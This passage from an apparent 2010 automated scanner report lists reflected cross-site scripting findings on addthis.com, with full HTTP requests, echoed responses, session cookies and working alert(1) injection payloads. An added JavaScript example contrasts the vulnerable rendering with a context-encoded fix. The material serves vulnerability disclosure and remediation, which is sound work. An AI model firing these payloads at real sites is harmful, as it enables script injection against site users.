User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.2.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/submit57fdb%3Cscript%3Ealert(1)%3C75a7b"-alert(1)-"0a892740684/script%3EHOYT-LLC-XSS-POC";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var
...[SNIP]...

2.112. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 49a57<script>alert(1)</script>3b229a5bc8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C49a57<script>alert(1)</script>3b229a5bc8c/script%3EHOYT-LLC-XSS-POC HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.2.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(1)%3C49a57<script>alert(1)</script>3b229a5bc8c/script%3EHOYT-LLC-XSS-POC</strong>
...[SNIP]...

2.113. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 41da8<script>alert(1)</script>0930d1726d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC41da8<script>alert(1)</script>0930d1726d1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.2.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC41da8<script>alert(1)</script>0930d1726d1</strong>
...[SNIP]...

2.114. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2d73"-alert(1)-"69586b36faf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POCc2d73"-alert(1)-"69586b36faf HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.2.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POCc2d73"-alert(1)-"69586b36faf";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.115. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a2749<script>alert(1)</script>6a4b41f81b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC?a2749<script>alert(1)</script>6a4b41f81b3=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.2.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC?a2749<script>alert(1)</script>6a4b41f81b3=1</strong>
...[SNIP]...

2.116. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0b50<script>alert(1)</script>e93df9b1aef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. REST URL parameter 1 is the first path segment (services); the request line shows the payload appended to it, and the 404 page echoes the whole modified URI inside its <strong> element, which is why each path segment of this URL produces its own finding against the same sink.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servicesf0b50<script>alert(1)</script>e93df9b1aef/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.1.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>servicesf0b50<script>alert(1)</script>e93df9b1aef/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT</strong>
...[SNIP]...

2.117. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad7de"-alert(1)-"5df2828d99b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. The response shows the second sink on the same 404 page: the echoed URI is assigned to var u inside an inline script, the payload's unescaped double quote closes that string literal, and the rest parses as the expression "..." - alert(1) - "...", which runs as soon as the page loads.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, write it as a JavaScript string literal with ", \, <, > and line terminators escaped (for example as \u003c), and HTML-encode the separate copy placed in the <strong> element; a single encoder does not cover both contexts.

Request

GET /servicesad7de"-alert(1)-"5df2828d99b/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.1.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/servicesad7de"-alert(1)-"5df2828d99b/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ?
...[SNIP]...
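
The captured responses in 2.115 through 2.117 show the whole bug: the 404 handler writes the raw request URI into two places, a <strong> element (HTML text) and the double-quoted string literal assigned to var u. The following is an added example, not code from the report or from addthis.com. The site's PHP handler is not shown, so a JavaScript stand-in reproduces just those two sinks, renders them first as captured and then with context-correct encoding, and runs the inline scripts with alert() stubbed to show which version executes the payload. The request URIs are copied from 2.116 and 2.117; the function names and the encoders are this example's own.

```javascript
// Added example: not code from the XSS.CX report or from addthis.com. The
// captured 404 page is produced by PHP (X-Powered-By: PHP/5.2.13) and its
// source is not shown, so this JavaScript stand-in reproduces only the two
// sinks visible in the responses above:
//   1. the request URI inside <strong>...</strong>  (HTML text between tags)
//   2. the request URI inside  var u = "/404...";   (double-quoted JS string)

// Vulnerable rendering: plain concatenation, as the captured page evidently does.
function renderNotFoundVulnerable(requestUri) {
  return [
    '<title>Not found</title>',
    '<strong>' + requestUri.slice(1) + '</strong>',
    '<script type="text/javascript">',
    'var u = "/404' + requestUri + '";',
    '</script>',
  ].join('\n');
}

// Hardened rendering: one encoder per output context.
function escapeHtmlText(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// JSON.stringify yields a valid double-quoted JS string literal (quotes and
// backslashes escaped). The extra replacements keep an injected </script> from
// closing the element and U+2028/U+2029 from ending the statement early.
function encodeJsString(s) {
  return JSON.stringify(s)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderNotFoundFixed(requestUri) {
  return [
    '<title>Not found</title>',
    '<strong>' + escapeHtmlText(requestUri.slice(1)) + '</strong>',
    '<script type="text/javascript">',
    'var u = ' + encodeJsString('/404' + requestUri) + ';',
    '</script>',
  ].join('\n');
}

// Execute every inline <script> the way a browser would (the first </script>
// ends the element), with alert() replaced by a recorder. Returns the alert
// arguments seen, any parse or runtime errors, and the final value of u so
// the hardened page can be checked for round-tripping the URI intact.
function runInlineScripts(html) {
  const result = { alerts: [], errors: [], u: undefined };
  const alert = (x) => { result.alerts.push(String(x)); };
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    try {
      const value = new Function('alert',
        m[1] + '\n;return (typeof u === "undefined") ? undefined : u;')(alert);
      if (value !== undefined) result.u = value;
    } catch (e) {
      result.errors.push(e.name); // e.g. SyntaxError once an injected </script> cut the block short
    }
  }
  return result;
}

// Request URIs copied from issues 2.116 (HTML text sink) and 2.117 (JS string sink).
const URI_HTML_TEXT = '/servicesf0b50<script>alert(1)</script>e93df9b1aef/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT';
const URI_JS_STRING = '/servicesad7de"-alert(1)-"5df2828d99b/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT';

function demoSinks() {
  return {
    vulnHtmlText: runInlineScripts(renderNotFoundVulnerable(URI_HTML_TEXT)),
    vulnJsString: runInlineScripts(renderNotFoundVulnerable(URI_JS_STRING)),
    fixedHtmlText: runInlineScripts(renderNotFoundFixed(URI_HTML_TEXT)),
    fixedJsString: runInlineScripts(renderNotFoundFixed(URI_JS_STRING)),
  };
}

console.log(demoSinks());
```

Run with node: the two vulnerable renderings each record one alert, the HTML-text case also producing a SyntaxError because the injected </script> truncates the real script block, exactly as a browser would see it. The two fixed renderings record no alert and hand back u equal to the original URI, which is the check worth keeping in a regression test: encoding must neutralise the payload without corrupting the value the page needs.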

2.118. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5766f"-alert(1)-"ba98fa08a3b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C5766f"-alert(1)-"ba98fa08a3b/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.1.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/submit57fdb%3Cscript%3Ealert(1)%3C5766f"-alert(1)-"ba98fa08a3b/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combina
...[SNIP]...

2.119. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 78312<script>alert(1)</script>0b016d8c0e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C78312<script>alert(1)</script>0b016d8c0e9/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.1.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(1)%3C78312<script>alert(1)</script>0b016d8c0e9/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT</strong>
...[SNIP]...

2.120. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fc54"-alert(1)-"82596acea0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

